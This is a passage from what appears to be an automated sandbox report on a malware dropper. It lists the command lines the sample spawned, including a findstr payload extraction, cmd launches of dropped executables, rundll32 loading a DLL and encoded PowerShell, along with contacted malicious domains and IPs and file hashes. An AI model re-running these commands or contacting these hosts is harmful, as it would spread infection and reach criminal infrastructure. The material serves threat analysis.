findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Plasmare.exe.pif

Plasmare.exe.pif J

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe

"C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe"

C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe

"C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VV2EF.tmp\poweroff.tmp" /SL5="$8025A,490199,350720,C:\Program Files\Internet Explorer\ZBQOJIFRJS\poweroff.exe" /VERYSILENT

C:\Program Files (x86)\powerOff\Power Off.exe

"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 452

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe & exit

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe

"C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe" -HELP

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 764

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772

C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe

C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 792

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 560 -p 10916 -ip 10916

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 10916 -s 696

C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe

"C:\Users\Admin\AppData\Local\Temp\Qzjfjhwisedatarecoveryportable_6_1_22.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 11196 -ip 11196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11196 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10312 -ip 10312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4132 -ip 4132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 848

Network

Country Destination Domain Proto
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 safialinks.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.182:80 tcp
US 8.8.8.8:53 best-link-app.com udp
US 8.8.8.8:53 ip-api.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 188.114.96.3:443 t.gogamec.com tcp
US 208.95.112.1:80 ip-api.com tcp
AU 103.224.212.220:443 www.listincode.com tcp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 8.8.8.8:53 mas.to udp
DE 88.99.75.82:443 mas.to tcp
US 8.8.8.8:53 ww25.listincode.com udp
US 199.59.243.220:80 ww25.listincode.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
N/A 127.0.0.1:49819 tcp
N/A 127.0.0.1:49821 tcp
FR 91.121.67.60:62102 tcp
DE 65.108.20.195:6774 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 www.iyiqian.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.133.1.107:80 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 govsurplusstore.com udp
DE 65.108.20.195:6774 tcp
FR 91.121.67.60:62102 tcp
US 8.8.8.8:53 best-forsale.com udp
US 8.8.8.8:53 chmxnautoparts.com udp
US 8.8.8.8:53 kwazone.com udp
US 8.8.8.8:53 gcl-page.biz udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 135.125.40.64:15456 tcp
US 8.8.8.8:53 pastebin.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 gcl-page.biz udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 xzaaen.click udp
RU 62.204.41.178:80 62.204.41.178 tcp
US 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 v2.trustnero.com udp
US 104.21.36.150:80 xzaaen.click tcp
US 104.21.1.91:80 v2.trustnero.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:80 xzaaen.click tcp
US 104.21.1.91:80 v2.trustnero.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:80 xzaaen.click tcp
US 104.21.1.91:80 v2.trustnero.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:443 xzaaen.click tcp
US 104.21.1.91:443 v2.trustnero.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
NL 23.2.164.159:80 x2.c.lencr.org tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 e1.o.lencr.org udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 telegram.org udp
NL 104.110.191.177:80 e1.o.lencr.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 v2.fakermet.com udp
US 104.21.14.22:443 v2.fakermet.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
NL 163.123.143.4:80 163.123.143.4 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
DE 65.108.20.195:6774 tcp
FR 91.121.67.60:62102 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 107.182.129.251:80 107.182.129.251 tcp
FR 135.125.40.64:15456 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 163.123.143.4:80 163.123.143.4 tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 v.xyzgamev.com udp
US 172.67.188.70:443 v.xyzgamev.com tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
FI 65.108.231.254:29517 tcp
RU 193.106.191.165:39482 tcp
DE 185.106.92.235:12654 tcp
RU 193.124.22.7:35318 tcp
NL 89.39.104.85:24947 tcp
RU 31.41.244.109:3590 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 iplis.ru udp
DE 148.251.234.93:443 iplis.ru tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.filifilm.com.br udp
US 108.179.193.18:443 www.filifilm.com.br tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:80 xzaaen.click tcp
DE 65.108.20.195:6774 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:80 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 104.21.36.150:443 xzaaen.click tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 1234567890r.s3.eu-west-1.amazonaws.com udp
US 8.8.8.8:53 banatfive.com udp
US 104.21.1.91:80 v2.trustnero.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 104.21.1.91:80 v2.trustnero.com tcp
FR 91.121.67.60:62102 tcp
US 104.21.1.91:80 v2.trustnero.com tcp
US 104.21.1.91:443 v2.trustnero.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 206.221.182.74:80 banatfive.com tcp
IE 52.218.29.208:80 1234567890r.s3.eu-west-1.amazonaws.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 206.221.182.74:80 banatfive.com tcp
US 104.21.14.22:443 v2.fakermet.com tcp
US 206.221.182.74:80 banatfive.com tcp
US 206.221.182.74:443 banatfive.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 alisncerec.com udp
FR 135.125.40.64:15456 tcp
IE 52.218.29.208:443 1234567890r.s3.eu-west-1.amazonaws.com tcp
US 172.67.215.47:443 alisncerec.com tcp
RU 62.204.41.144:14096 tcp
DE 194.36.177.7:39556 tcp
DE 185.106.92.8:38644 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 8.8.8.8:53 adam.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:80 adam.s3.pl-waw.scw.cloud tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 46.249.58.152:80 46.249.58.152 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 connectini.net udp
GB 37.230.138.123:443 connectini.net tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 208.67.104.97:80 208.67.104.97 tcp
NL 212.193.30.115:80 212.193.30.115 tcp
DE 148.251.234.93:443 iplis.ru tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 adam.s3.pl-waw.scw.cloud udp
RU 185.215.113.70:21508 tcp
US 208.67.104.97:80 208.67.104.97 tcp
DE 65.108.20.195:6774 tcp
FR 91.121.67.60:62102 tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 zwfomdimhjwAVfoIzVbTiDlZB.zwfomdimhjwAVfoIzVbTiDlZB udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 135.125.40.64:15456 tcp
US 8.8.8.8:53 kGKoXASPnibTGgB.kGKoXASPnibTGgB udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 8.8.8.8:53 adam.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:443 adam.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 ghetto.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:443 ghetto.s3.pl-waw.scw.cloud tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 360devtracking.com udp
GB 37.230.138.66:80 360devtracking.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 connectini.net udp
GB 37.230.138.123:443 connectini.net tcp
GB 37.230.138.66:80 360devtracking.com tcp
NL 212.193.0.28:80 212.193.0.28 tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 htagzdownload.pw udp
BE 35.205.61.67:80 htagzdownload.pw tcp
US 8.8.8.8:53 a.game2723.com udp
US 188.114.97.0:443 a.game2723.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 b.game2723.com udp
US 188.114.97.0:443 b.game2723.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 host-file-host9.com udp
PL 34.118.39.10:80 host-file-host9.com tcp
US 8.8.8.8:53 tg8.cllgxx.com udp
US 85.209.157.230:80 tg8.cllgxx.com tcp
DE 65.108.20.195:6774 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:62102 tcp
US 8.8.8.8:53 v.xyzgamev.com udp
US 172.67.188.70:443 v.xyzgamev.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 135.125.40.64:15456 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.filifilm.com.br udp
US 108.179.193.18:443 www.filifilm.com.br tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 alisncerec.com udp
US 104.21.45.140:443 alisncerec.com tcp
FI 65.108.27.131:45256 tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 guidereviews.bar udp
US 8.8.8.8:53 auto-repair-solutions.bar udp
US 8.8.8.8:53 onepremiumstore.bar udp
US 8.8.8.8:53 premium-s0ftwar3875.bar udp
BE 35.205.61.67:443 premium-s0ftwar3875.bar tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
BE 35.205.61.67:80 premium-s0ftwar3875.bar tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

memory/3452-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 caf8ca550d3f3d81c5f365fe52b6a968
SHA1 58ffab07a16ab43a29f6c6c7350ad9465e38d7a6
SHA256 1cc768cdba83c2d01b3ddf5a9e1e0c5f27d0e9c46f667bc1625f6897a4509808
SHA512 d21bf6ca63883297963d5ed6599517d9628b3f0bdd7208a48e0b577c20027756b1dbcc99b0194cdd71e60f8d412d3ade703238a36aec9bd8a63b1e45980085b0

memory/3496-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe

MD5 fd028a8767b18e446c4c20c95bc1cd13
SHA1 9b3c725a720fc615cf9db72cf2449c558b4e87d3
SHA256 b7d92a51ae6861c7e3853b031acefb078268dfb5cab0b340017691d5f3ef2f05
SHA512 c1fb52eb12c26c9367cfd8c48fdc6c4310af5e58a873165ec9a4121ee999f84bef6a5602f01d3439881f45736cc2990ca76339cd5d76afa25a276c31a667bacb

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3496-148-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-150-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
